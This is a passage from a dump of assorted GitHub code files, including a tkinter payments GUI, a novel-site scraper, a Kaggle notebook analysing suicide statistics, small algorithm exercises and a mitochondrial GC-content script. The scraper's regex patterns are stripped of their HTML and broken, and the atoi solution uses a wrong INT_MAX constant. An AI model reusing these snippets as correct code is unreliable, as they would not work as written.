]).strip().decode('utf-8')\n assert len(jxc_version) > 0 and len(jxc_version.split('.')) == 3\n\n make_release(jxc_version, repo_root, output_path, amal_core, amal_cpp)\n","repo_name":"juddc/jxc","sub_path":"tools/make_release_archive.py","file_name":"make_release_archive.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"53"}
+{"seq_id":"30617207413","text":"class Solution(object):\n def myAtoi(self, str):\n \"\"\"\n :type str: str\n :rtype: int\n \"\"\"\n \n # discard extra white space\n atoi_string = str.strip()\n \n INT_MAX = 2147483649\n INT_MIN = -(INT_MAX - 1)\n sign = [\"-\", \"+\"]\n \n result = \"\"\n \n for index, char in enumerate(list(atoi_string)):\n if index == 0:\n if char.isdigit() or char in sign:\n result += char\n else: \n return 0\n else:\n if char.isdigit():\n result += char\n else:\n break\n \n num = int(result) \n if num < INT_MIN or num > INT_MAX:\n return INT_MIN if num < 0 else INT_MAX\n \n return num\n\ns = Solution()\nprint(s.myAtoi(\"42\"))\nprint(s.myAtoi(\"4193 with words\"))\nprint(s.myAtoi(\"42\"))\nprint(s.myAtoi(\"42\"))","repo_name":"rakontuh/algorithms","sub_path":"Algorithms/Stanford/week-1/atoi.py","file_name":"atoi.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"17285293095","text":"# Importamos los módulos necesarios\nimport tkinter as tk\nfrom tkinter import *\nimport customtkinter\nfrom customtkinter import CTkEntry, CTkButton\nfrom ttkthemes import ThemedTk\nfrom tkinter import PhotoImage\nfrom PIL import ImageTk, Image\nimport customtkinter as ctk\nfrom menu_registro import *\nfrom funciones2 import *\nfrom menu_pagos import *\nfrom consulta import *\n#from funct import *\nfrom cobranza import*\n# Creamos una ventana principal\nroot = ctk.CTk()\n\nroot.title(\"LS Software\")\nroot.geometry(\"1366x768+1+1\")\n#title_label = Label(root, text=\"LS Software\")\n\nroot.config(background=\"gray21\")\n\n# Creamos un canvas con un color de fondo y sin bordes\ncanvas = tk.Canvas(root, width=1280, height=720, bg=\"gray21\",\n highlightthickness=0)\ncanvas.pack()\n\n# Cargamos una imagen desde un archivo\n#imagen = Image.open(\"image.png\")\n# La convertimos a un formato compatible con tkinter\nphoto = PhotoImage(file=\"image.png\")\n# Creamos una imagen sobre el canvas con la foto cargada\ncanvas_image = canvas.create_image(650, 270, image=photo, anchor=CENTER)\n\nwindow = root\n# creacion del entry\nentry = ctk.CTkEntry(window, width=285, height=38,\n fg_color=\"snow2\", text_color=\"black\",\n font=(\"arial\", 20), placeholder_text=\"ej: 18123456\",\n justify=\"center\")\n# aqui la ubicamos:\nentry.place(x=676, y=621, anchor=CENTER)\n\n#funciones para bottones\ndef agregar():\n cedula = entry.get()\n print(\"accion para registrar pago de mensualidad: \" + cedula)\n\ndef buscar():\n cedula = entry.get()\n print(\"accion para buscar estado de cuenta del representante: \"\n + cedula)\n\n#Boton de agregar para registrar pagos de mensualidades\n\nadd_button = CTkButton(window, text=\"Agregar\", font=(\"arial\", 16),\n anchor=CENTER, width=10, command=agregar)\nadd_button.place(x=685, y=657, anchor=CENTER)\n\n#buscar_button = busqueda con la CI para ver estado de cuenta del representante\nbuscar_button = CTkButton(window, text=\"Buscar\",\n font=(\"arial\", 16),\n width=10, height=37, command=buscar)\nbuscar_button.place(x=855, y=621, anchor=CENTER)\n\n# Crear una instancia de Menu\nmenu_bar = Menu(root, background=\"black\")\n# Asignar la barra de menú a la ventana\nroot.config(menu=menu_bar)\n\n# Crear un elemento de menú \"Archivo\"\narchivo_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"ARCHIVO\", font=(\"calibri\", 18),\n menu=archivo_menu)\n\narchivo_menu.add_command(label=\"Nuevo\", command=nuevo)\narchivo_menu.add_command(label=\"Abrir\",command=abrir )\narchivo_menu.add_command(label=\"Importar\", command=importar)\narchivo_menu.add_command(label=\"Exportar\", command=exportar)\narchivo_menu.add_separator()\narchivo_menu.add_command(label=\"Salir\", command=root.quit)\n\n# Agregar el elemento de menú \"Registro\" a la barra de menú\nregistro_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"REGISTRO\", menu=registro_menu)\n\nregistro_menu.add_command(label=\"Representante\", command=representante)\nregistro_menu.add_command(label=\"Alumno\", command=alumno)\nregistro_menu.add_command(label=\"opcion 3\", command=opcion)\n\n# construccion del menu PAGOS\npagos_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"PAGOS\", menu=pagos_menu)\n\npagos_menu.add_command(label=\"Inscripcion\",command=inscripcion)\n\npagos_menu.add_command(label=\"Mensualidad\",command=pago_mensualidad)\n\n\npagos_menu.add_command(label=\"Cierre Diario\", command=cierre)\npagos_menu.add_command(label=\"Facturas\")\n\n# Agregar el elemento \"CONSULTAS\" a la barra de menú\nconsultas_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\n#creating cascade\nmenu_bar.add_cascade(label=\"CONSULTAS\", menu=consultas_menu)\n#creating elements for cascade\nconsultas_menu.add_command(label=\"Info Representante\",command=consulta_representante)\nconsultas_menu.add_command(label=\"Info Alumnos\",command=consulta_alumnos)\n#CREAR SUB_MENU MOROSIDAD\nmorosidad_menu = Menu(consultas_menu, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmorosidad_menu.add_command(label=\"Por Alumno\",command=consulta_alumnos)\nmorosidad_menu.add_command(label=\"Por curso\",command=consulta_curso)\nmorosidad_menu.add_command(label=\"TOTAL\")\nconsultas_menu.add_cascade(label=\"MOROSIDAD\", menu=morosidad_menu)\nconsultas_menu.add_command(label=\"opcion 4\") #extra option\n\n# Agregar cuentas por cobrar\ncobranza_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"COBRANZA\", menu=cobranza_menu)\n\ncobranza_menu.add_command(label=\"Por Alumno\",command=cobranza_alumno)\ncobranza_menu.add_command(label=\"Por curso\",command=cobranza_curso)\ncobranza_menu.add_command(label=\"TOTAL\")\n\n# Iniciamos el bucle principal de la ventana\nroot.mainloop()","repo_name":"jossephtrump/ventanas","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33016458718","text":"# -*- coding= utf-8 -*-\n# @Time : 2021-04-15 8:40\n# @Author : baoguo\n# @File : Day6-小说爬虫实战.py\n# @Software : PyCharm\nimport urllib.request, urllib.error\nfrom bs4 import BeautifulSoup\nimport xlwt\nimport re\nimport sqlite3\nimport gzip\nfrom io import BytesIO\n\n'''\n 需求:小说爬取 \n url = \"http://www.biquku.la/0/421/\" \n 数据爬取出现UnicodeDecodeError: \n 'utf-8' codec can't decode byte 0x8b in position 1: invalid start byte错误\n 是因为Accept-Encoding: gzip, deflate \n 需要通过gzip、BytesIO进行解压缩\n '''\n\n\ndef main():\n url = \"http://www.biquku.la/0/421/\"\n getData(url)\n # askURL(url)\n\n\nPageUrl = re.compile(r'.*')\ntName = re.compile(r'
(.*)
', re.S)\ntData = re.compile(r'
(.*?)
')\n\n\ndef getData(url):\n list = getUrl(url)\n for i in range(len(list)):\n newUrl = \"\"\n newUrl = url + str(list[i])\n html = askURL(newUrl)\n btf = BeautifulSoup(html, \"html.parser\")\n for item in btf.find_all('div', class_='content_read'):\n item = str(item)\n tname = re.findall(tName, item)[0]\n tdata = re.findall(tData, item)\n with open(\"DouLuoDaLu/\" + tname + '.txt', 'w', encoding='utf-8') as f:\n for data in tdata:\n data = \"\".join(data.split())\n f.write(data.replace('
\n\n# In[ ]:\n\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nwarnings.filterwarnings('ignore')\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n# In[ ]:\n\n\n#dataset read operation\n#read_csv function is required to read the data.\ndata=pd.read_csv('../input/master.csv')\n\n# In[ ]:\n\n\n#show data first 5 rows\ndata.head()\n\n# In[ ]:\n\n\n#show data last 5 rows\ndata.tail()\n\n# In[ ]:\n\n\n#random rows in dataset\ndata.sample(5)\n\n# In[ ]:\n\n\ndata.sample(frac=0.1)\n\n# In[ ]:\n\n\n#Describe function includes analysis of all our numerical data. For this, count, mean, std, min,% 25,% 50,% 75, max values are given.\ndata.describe()\n\n# In[ ]:\n\n\ndata.iloc[:,1:5].describe()\n\n# In[ ]:\n\n\n#The info function shows the data types and numerical values of the features in our data set.\ndata.info()\n\n# In[ ]:\n\n\n#We will now set the headings of the feature values in the data set.\ndata.columns\n\n# In[ ]:\n\n\n#so,change the names of the column. Because there may be problems for future analysis.\ndata=data.rename(columns={'country':'Country','year':'Year','sex':'Gender','age':'Age','suicides_no':'SuicidesNo','population':'Population','suicides/100k pop':'Suicides100kPop','country-year':'CountryYear','HDI for year':'HDIForYear',' gdp_for_year ($) ':'GdpForYearMoney','gdp_per_capita ($)':'GdpPerCapitalMoney','generation':'Generation'})\n\n# In[ ]:\n\n\ndata.columns\n\n# In[ ]:\n\n\n#And, how many rows and columns are there for all data?\nprint('Data Shape :')\ndata.shape\n\n# In[ ]:\n\n\ndata.isnull().any()\n\n# In[ ]:\n\n\ndata.isnull().values.any()\n\n# In[ ]:\n\n\n#Now,I will check null on all data and If data has null, I will sum of null data's. In this way, how many missing data is in the data.\ndata.isnull().sum()\n\n# In[ ]:\n\n\n#As you can see, most of the HDIForYear value is empty. That's why I want this value deleted.\ndata=data.drop(['HDIForYear','CountryYear'],axis=1)\n\n# In[ ]:\n\n\n#Now start analysis, min year and max year will find them\nmin_year=min(data.Year)\nmax_year=max(data.Year)\nprint('Min Year :',min_year)\nprint('Max Year :',max_year)\n\n#1985 min year,2016 max year.\n\ndata_country=data[(data['Year']==min_year)]\n\ncountry_1985=data[(data['Year']==min_year)].Country.unique()\ncountry_1985_male=[]\ncountry_1985_female=[]\n\nfor country in country_1985:\n country_1985_male.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='male')]))\n country_1985_female.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='female')])) \n \n#We found the ratio of men and women who committed suicide in some countries in 1985 and we are now charting.\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_1985,x=country_1985_male,color='red')\nsns.barplot(y=country_1985,x=country_1985_female,color='yellow')\nplt.ylabel('Countries')\nplt.xlabel('Count Male vs Female')\nplt.title('1985 Year Suicide Rate Gender')\nplt.show()\n\n#Very odd all the rates came on an equal level. So let's do max year.\n\ndata_country=data[(data['Year']==max_year)]\n\ncountry_2016=data[(data['Year']==max_year)].Country.unique()\ncountry_2016_male=[]\ncountry_2016_female=[]\n\nfor country in country_2016:\n country_2016_male.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='male')]))\n country_2016_female.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='female')])) \n \n#We found the ratio of men and women who committed suicide in some countries in 1985 and we are now charting.\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_2016,x=country_2016_male,color='red')\nsns.barplot(y=country_2016,x=country_2016_female,color='yellow')\nplt.ylabel('Countries')\nplt.xlabel('Count Male vs Female')\nplt.title('2016 Year Suicide Rate Gender')\nplt.show()\n\n#
While the suicide rate was widespread in more countries in 1985, this ratio has fallen considerably in 2016. Now let us examine the other features of these countries.
\n\n# In[ ]:\n\n\ndata_country=data[(data['Year']==min_year)]\n\ncountry_1985_population=[]\n\nfor country in country_1985:\n country_1985_population.append(sum(data_country[(data_country['Country']==country)].Population)) \n\n#Now year 1985 find sum population every country\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_1985,x=country_1985_population)\nplt.xlabel('Population Count')\nplt.ylabel('Countries')\nplt.title('1985 Year Sum Population for Suicide Rate')\nplt.show()\n\n#######################################################\n\ndata_country=data[(data['Year']==max_year)]\n\ncountry_2016_population=[]\n\nfor country in country_2016:\n country_2016_population.append(sum(data_country[(data_country['Country']==country)].Population)) \n\n#Now year 1985 find sum population every country\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_2016,x=country_2016_population)\nplt.xlabel('Population Count')\nplt.ylabel('Countries')\nplt.title('2016 Year Sum Population for Suicide Rate')\nplt.show()\n\n\n#
The values we found on the upper side give the total population we found in 1985 in 2016.
\n\n# In[ ]:\n\n\nsuicideGender1985=data_country.groupby(['Country','Gender']).SuicidesNo.sum()\n\n# In[ ]:\n\n\nsuicideGender1985\n\n# In[ ]:\n\n\ndata_country=data[(data['Year']==min_year)]\n\ndata_age_5_14=[]\ndata_age_15_24=[]\ndata_age_25_34=[]\ndata_age_35_54=[]\ndata_age_55_74=[]\ndata_age_75=[]\n\nfor country in country_1985:\n data_age_5_14.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='5-14 years')]))\n data_age_15_24.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='15-24 years')]))\n data_age_25_34.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='25-34 years')]))\n data_age_35_54.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='35-54 years')]))\n data_age_55_74.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='55-74 years')]))\n data_age_75.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='75+ years')]))\n \n\n#######################################################\n\ndata_country=data[(data['Year']==max_year)]\n\ndata_age_5_14=[]\ndata_age_15_24=[]\ndata_age_25_34=[]\ndata_age_35_54=[]\ndata_age_55_74=[]\ndata_age_75=[]\n\nfor country in country_2016:\n data_age_5_14.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='5-14 years')]))\n data_age_15_24.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='15-24 years')]))\n data_age_25_34.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='25-34 years')]))\n data_age_35_54.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='35-54 years')]))\n data_age_55_74.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='55-74 years')]))\n data_age_75.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='75+ years')]))\n \n#there is an equal rate. We need to make the query process a little more complicated.\n\n# In[ ]:\n\n\nsns.countplot(data.Gender)\nplt.show()\n#there has been an even gender distribution.\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,5))\nsns.countplot(data.Gender,hue=data.Age)\nplt.title('Gender & Age')\nplt.show()\n#there has been an even gender & hue age distribution.\n\n# In[ ]:\n\n\ndata.groupby('Age')['Gender'].count()\n\n# In[ ]:\n\n\nsns.barplot(x=data.groupby('Age')['Gender'].count().index,y=data.groupby('Age')['Gender'].count().values)\nplt.xticks(rotation=90)\nplt.show()\n\n# In[ ]:\n\n\nsuicidesNo=[]\nfor country in data.Country.unique():\n suicidesNo.append(sum(data[data['Country']==country].SuicidesNo)) \n\n# In[ ]:\n\n\nsuicidesNo=pd.DataFrame(suicidesNo,columns=['suicidesNo'])\ncountry=pd.DataFrame(data.Country.unique(),columns=['country'])\ndata_suicide_countr=pd.concat([suicidesNo,country],axis=1)\n#sns.barplot(x=data.Country.unique(),y=suicidesNo) \n#plt.show()\n\n# In[ ]:\n\n\ndata_suicide_countr=data_suicide_countr.sort_values(by='suicidesNo',ascending=False)\n\n# In[ ]:\n\n\nsns.barplot(y=data_suicide_countr.country[:15],x=data_suicide_countr.suicidesNo[:15])\nplt.show()\n\n#
It appears that after examining our data, we examined the total suicide rates and prepared a chart that handled the most from the least.
As a result, we have explained the seaborn library in a very detailed way and created a wide variety of graphs. If you like it, I expect your support. If you like UPVOTED I would be very happy if you do. If you have any questions, I am ready to answer your questions. At the bottom there are the kernel values that I have already done.
\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample531.py","file_name":"sample531.py","file_ext":"py","file_size_in_byte":18220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"21150685799","text":"def gcd(a, b):\n x = max(a, b)\n y = min(a, b)\n while y != 0:\n x, y = y, x % y\n return x\n\n\ndef mod_mul(x, y, n):\n res = 0\n i = 1\n j = x % n\n while i <= y:\n if y & i != 0:\n res += j\n res %= n\n i *= 2\n j *= 2\n j %= n\n return res\n\n\ndef cycle(x, n):\n y = x\n count = 1\n while y != 1:\n y = mod_mul(y, x, n)\n count += 1\n return count\n\n\ndef lcm(x, y):\n return x * y // gcd(x, y)\n\n\ndef best_remainder(a):\n best = 2\n x, y = a - 1, a + 1\n for i in range(lcm(cycle(a - 1, a ** 2), cycle(a + 1, a ** 2))):\n if (x + y) % a ** 2 > best:\n best = (x + y) % a ** 2\n x = mod_mul(x, a - 1, a ** 2)\n y = mod_mul(y, a + 1, a ** 2)\n return best\n\n\ndef total(n):\n return sum([best_remainder(i) for i in range(3, n + 1)])\n","repo_name":"womri1998/ProjectEuler100s","sub_path":"problem120.py","file_name":"problem120.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4187247313","text":"class Node:\n def __init__(self, val, next=None):\n self.val = val\n self.next = None\n\n def __str__(self):\n return f'{self.val},{self.next}'\n \nclass CLL:\n def __init__(self):\n self.head = None\n\n def insert(self, val):\n if self.head is None:\n self.head = Node(val)\n self.head.next = self.head\n return\n cur=dum=self.head\n while cur.next is not dum:\n cur=cur.next\n cur.next=Node(val)\n cur.next.next=dum\n \n def display(self,head):\n cur=self.head\n op = [str(cur.val)]\n cur=cur.next\n while cur is not self.head:\n op.append(str(cur.val))\n cur=cur.next\n return ' -> '.join(op)\n\n def splitl(self,head):\n f=s=head\n while f.next is not head and f.next.next is not head:\n f=f.next.next\n s=s.next\n print(f'second half is {self.display(s.next)}')\n\ncll=CLL()\ncll.insert(1)\ncll.insert(2)\ncll.insert(3)\ncll.insert(4)\nprint(cll.display(cll.head))\ncll.splitl(cll.head)\n","repo_name":"mahadev521/Book1","sub_path":"linkedlists/cll.py","file_name":"cll.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42632310261","text":"#This script is part of supplementary documents of \"Impact of Introns and Homing Endonucleases on Structural Mitogenome Shaping in Hypocreales\"\n#submitted to Frontiers in Microbiology, section Fungi and Their Interactions\n#Manuscript ID: 531057\n#Authors: Paula Fonseca, Fernanda Badotti, Ruth De-Paula, Daniel Araújo, Dener Eduardo Bortolini, Luiz-Eduardo Del-Bem, Vasco Ariston De Carvalho Azevedo, \n#Bertram Brenig, Eric Roberto Guimarães Rocha Aguiar, Aristóteles Góes-Neto\n\n#This script calculates the GC content of whole genome, CDS and genes in the uORFs file\n#The files used are as follow: \n# -uORFs - Generated by Mfannot2uORFs.py script\n# -cds - Generated by getGenesGenBank2Cds.py script\n# -fasta - Donwloaded from NCBI\n\n#******************************************************************************#\n# Run the code in Python 3+ #\n#******************************************************************************#\n\n# -*- Coding: UTF-8 -*-\n#coding: utf-8\n\nimport sys\nimport os.path\nfrom os import path\n\ndef checkInputFiles():\n # #Check if all the necessary files names are passed as arguments\n if (len(sys.argv)!=4 or sys.argv[1].find(\".uORFs\")==-1 or sys.argv[2].find(\".cds\")==-1 or sys.argv[3].find(\".fasta\")==-1):\n print(\"\\n----------------------------------------------------------------------------------------------------\\n\")\n print(\"\\nUsage:\\npython GCContentORFsCdsCirc.py [file_path_name.uORFs] [file_path_name.cds] [file_path_name.fasta]\\n\")\n sys.exit(0)\n\n #Get path/file names\n uORFs_file_name=sys.argv[1]\n cds_file_name=sys.argv[2]\n fasta_file_name=sys.argv[3]\n\n #Check if path/files exists\n if (path.exists(uORFs_file_name)==False or path.exists(cds_file_name)==False or path.exists(fasta_file_name)==False):\n print(\"\\n--------------------------------------------------------------------------------------------\\n\")\n print(\"\\nOne or more files not found! Check the path and file names.\\n\")\n print(\"\\n--------------------------------------------------------------------------------------------\\n\")\n exit(0)\n\n #Open input files\n uORFs_file=open(uORFs_file_name,'r') \n cds_file=open(cds_file_name, 'r')\n fasta_file=open(fasta_file_name,'r')\n\n #Open output files. The ID filename in uORFs file is used to generate the result files ('.gct' and '.csv')\n if (os.name==\"nt\"):\n uORFs_file_name=uORFs_file_name.strip(\".\\\\\")\n output_file_name=uORFs_file_name[0:uORFs_file_name.find(\".\")]\n output_gct_file=open(output_file_name+\".gct\",'w')\n #The csv file was generated to help analyze the results. Each row of 'csv' file represent a nucleotide position in the whole genome. \n #The idea is as follows:\n #Row value= 0 = indicates the nucleotide belongs a non coding region\n #Row value= 1 = indicates the nucleotide belongs a coding region\n #Row value= 2 = indicates the nucleotide belongs a coding region and to 2 genes. \n #Row value= 10 = indicates the nucleotide belongs a non coding region and to a uORF\n #Row value= 11 = indicates the nucleotide belongs a coding region and to a uORF\n #Row value= 12 = indicates the nucleotide belongs a coding region, to a uORF and 2 genes\n #Row value= 22 = indicates the nucleotide belongs a coding region, to 2 uORFs and 2 genes\n #and so on\n #The strip will remove '.\\' that appear on console in Windows 10 before path\\filename \n output_csv_file=open(output_file_name+\".csv\",'w')\n\n return uORFs_file,cds_file,fasta_file,output_gct_file,output_csv_file \n\n\n#This function creates a numerical array (genome_array) which will tell us where the coding, non coding and uORFs are.\n#Based on cds file, the genome_array returned from it contains the data of coding and noncoding regions of genes detailed in GenBank \ndef createGenomeArray(cds_file):\n #genome_array represent the whole genome. Position 0 is not used.\n genome_array=[]\n genome_size=0\n #Loop to get data from cds file\n for line in cds_file: \n #get total genome size from cds file\n if (line.find(\"Genome size: \")!=-1):\n genome_size=int(line[13:]) \n #Instantiate size of genome in genome_array and populates with value=0\n genome_array=[0]*(genome_size+1)\n \n #Get start and end positions of coding regions (genes on cds)\n if (line.find(\";\")!=-1):\n aux_index=line.find(\";\")\n line=line.strip()\n start=int(line[:aux_index])\n end=int(line[aux_index+1:line.find(\"#\")])\n #Loop to register nucleotides that belong to coding regions, based on start and end positions retrieved\n #This adds +1 every time a nucleotide belong to a gene in cds file\n #To contemplate the circular genome, we use a while loop to process every nucleotide in the sequence\n i=start\n while True:\n genome_array[i]=genome_array[i]+1\n if (i==end):\n break\n i=i+1\n #Check if it is the final position of genome and point to the first one\n if (i>len(genome_array)-1):\n i=1\n return genome_size,genome_array\n\ndef checkCG(nc_char):\n if (nc_char=='C' or nc_char=='G'):\n return True\n else:\n return False\n\n#This function calculates the GC content of the coding and non coding regions of a sequence. Using the genome_array as input,\n#its possible to determinte the GC content in coding and non coding regions. \ndef gcContentCalc(start, end, sequence, genome_array):\n #seq_cds store the sequence of nucleotides that are part of the coding region. Those nucleotides that are not part of the coding region are replaced by '-'\n seq_cds=\"\"\n #sum_GC_nc store the sum of GC nucleotides in the sequence\n sum_GC_nc=0\n #sum_GC_nc_cds store the sum of GC nucleotides that are part of coding region in the sequence\n sum_GC_nc_cds=0\n #sum_nc_cds store the sum of ALL nucleotides that are part of coding region in the sequence\n sum_nc_cds=0\n #For every nucleotide in the sequence we do a while loop which comtemplate the circular genome\n #Here we have a sequence of interest being compared and saved on seq_cds, because of this we have a second iterator\n i=start\n seq_it=0\n while True:\n if (checkCG(sequence[seq_it])):\n sum_GC_nc=sum_GC_nc+1\n #Check if nucleotide is part of coding region\n #uORFs nucleotides adds +10 to genome_array and gene coding regions derived form cds file adds +1\n #So we get the remainder of division by 10\n if (genome_array[i]%10>0):\n sum_GC_nc_cds= sum_GC_nc_cds+1\n sum_nc_cds=sum_nc_cds+1\n #Add nucleotide to seq_cds\n seq_cds=seq_cds+sequence[seq_it]\n else:\n seq_cds=seq_cds+'-'\n elif (genome_array[i]%10>0):\n sum_nc_cds=sum_nc_cds+1\n #Add nucleotide to seq_cds\n seq_cds=seq_cds+sequence[seq_it]\n else:\n seq_cds=seq_cds+'-'\n #Adding +10 to genome_array will help later check where are the nucleotides that belong to uORFs in csv file\n #Values greater than or equal 10\n genome_array[i]=genome_array[i]+10\n if (i==end):\n break\n i=i+1\n seq_it=seq_it+1\n #Check if 'i' it is the final position of genome and point to the first one\n if (i>len(genome_array)-1):\n i=1\n tam_seq=len(sequence)\n #The next command line returns: proportion of GC nucleotides in the sequence\n #Nucleotides in coding region of the sequence\n #Total of GC nucleotides in the sequence\n #Total of GC nucleotides in the coding region of the sequence\n #Total of nucleotides in the coding region of the sequence\n return seq_cds, sum_GC_nc, sum_GC_nc_cds, sum_nc_cds\n\n\n#This function read the whole genome from fasta file\ndef readWholeGenome(fasta_file):\n #The position 0 of whole_genome will not be used\n whole_genome=\" \"\n for line in fasta_file:\n if(line[0]!=\">\"):\n line=line.upper()\n whole_genome=whole_genome+line.strip()\n fasta_file.close()\n return whole_genome\n\n#Funtion that prints and save on output file the individual ORFs results\ndef printSaveuORFsResults(name_ORF,seq_ORF,sum_ORF_cds,start_ORF,end_ORF,ratio_GC_ORF,ratio_GC_ORF_cds,output_gct_file):\n print(\"____________________________________________________________\")\n print(name_ORF)\n print(\"uORf original sequence:\\n\"+seq_ORF+\"\\nuORF sequence in CDS:\\n\"+sum_ORF_cds)\n print(start_ORF, end_ORF)\n print(\"GC Content of Orf:\",round(ratio_GC_ORF,2))\n print(\"GC Content of Orf in CDS:\",round(ratio_GC_ORF_cds,2))\n output_gct_file.write(name_ORF)\n output_gct_file.write(str(start_ORF)+\",\"+str(end_ORF)+\"\\n\")\n output_gct_file.write(\"uORf original sequence:\\n\"+seq_ORF.rstrip()+\"\\nuORF sequence in CDS:\\n\"+sum_ORF_cds+\"\\n\")\n output_gct_file.write(\"Conteudo GC Orf: \"+str(round(ratio_GC_ORF,2))+\"\\nConteudo GC Orf CDS: \"+str(round(ratio_GC_ORF_cds,2))+\"\\n\\n\")\n\n#Function that reads the uORFs file and calculate GC content for each one of the ORFs listed in it. Summary variables are returned as result.\ndef uORFsFileGCCalc(uORFs_file, genome_array, output_gct_file):\n name_ORF=\"\"\n #Total number of GC ORFs nucleotides\n sum_nc_GC_ORFs=0\n #Total number of GC ORFs nucleotides that are part of coding regions\n sum_nc_GC_ORFs_cds=0\n #Total number of ORFs nucleotides\n sum_nc_ORFs=0\n #Total number of ORFs nucleotides in coding regions\n sum_nc_ORFs_cds=0\n for line in uORFs_file:\n if (line.find(\">\")!=-1):\n name_ORF=line[1:]\n elif (line.find(\"+\")!=-1):\n start_ORF=int(line[1:])\n elif (line.find(\"-\")!=-1):\n end_ORF=int(line[1:])\n elif (line.find(\"@\")!=-1):\n seq_ORF=line[1:].upper().strip()\n size_ORF=len(seq_ORF)\n #Call function that calculate GC Content and update genome_array\n sum_ORF_cds, sum_GC_ORF_nc, sum_GC_ORF_nc_cds, sum_ORF_nc_cds=gcContentCalc(start_ORF, end_ORF, seq_ORF, genome_array)\n\n #Ratio_GC_ORF shows the proportion of GC nucleotides of the sequence\n ratio_GC_ORF=sum_GC_ORF_nc/len(seq_ORF)*100\n\n #Ratio_GC_ORF_cds shows the proportion of GC nucleotides in the coding region of the sequence\n ratio_GC_ORF_cds=0\n #Check to avoid division by 0\n if (sum_ORF_nc_cds>0):\n ratio_GC_ORF_cds=sum_GC_ORF_nc_cds/sum_ORF_nc_cds*100\n else:\n ratio_GC_ORF_cds=sum_GC_ORF_nc_cds/1*100\n #Print and save in output files the ORF values\n printSaveuORFsResults(name_ORF, seq_ORF, sum_ORF_cds, start_ORF, end_ORF, ratio_GC_ORF, ratio_GC_ORF_cds, output_gct_file)\n\n sum_nc_GC_ORFs=sum_nc_GC_ORFs + sum_GC_ORF_nc\n sum_nc_GC_ORFs_cds=sum_nc_GC_ORFs_cds + sum_GC_ORF_nc_cds\n sum_nc_ORFs=sum_nc_ORFs+size_ORF\n sum_nc_ORFs_cds=sum_nc_ORFs_cds+sum_ORF_nc_cds\n\n #Return summary values\n return sum_nc_GC_ORFs,sum_nc_GC_ORFs_cds,sum_nc_ORFs,sum_nc_ORFs_cds,sum_nc_ORFs-sum_nc_ORFs_cds\n\n#Print and saves on input file the final summary results\ndef printSaveFinalSummary(genome_size, sum_nc_genome_cds, sum_nc_genome_noncod, sum_GC_nc, sum_GC_nc_cds, sum_GC_nc_noncod, sum_nc_ORFs, sum_nc_GC_ORFs, sum_nc_ORFs_cds, \\\n sum_nc_GC_ORFs_cds, sum_nc_ORFs_noncod, output_gct_file):\n\n print(\"____________________________________________________________\")\n print(\"\\n\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------\")\n print(\"Whole genome total size = \"+str(genome_size)+\" nucleotides, where \"+ str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_nc_genome_cds/genome_size*100,2)) \\\n +\"%) belongs to coding regions (CDS) and \"+ str(sum_nc_genome_noncod)+\" nucleotides (\"+str(round(sum_nc_genome_noncod/genome_size*100,2))+\"%) belongs to non coding regions (NC)\")\n print(\"Whole genome GC content = \"+str(sum_GC_nc)+\" of \"+str(genome_size)+\" nucleotides (\"+str(round(sum_GC_nc/genome_size*100,2))+\"%)\")\n print(\"GC content in coding regions = \"+str(sum_GC_nc_cds)+\" of \"+str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_GC_nc_cds/sum_nc_genome_cds*100,2))+\"%)\")\n print(\"GC content in non coding regions = \"+str(sum_GC_nc_noncod)+\" of \"+str(sum_nc_genome_noncod)+\" nucleotides (\" 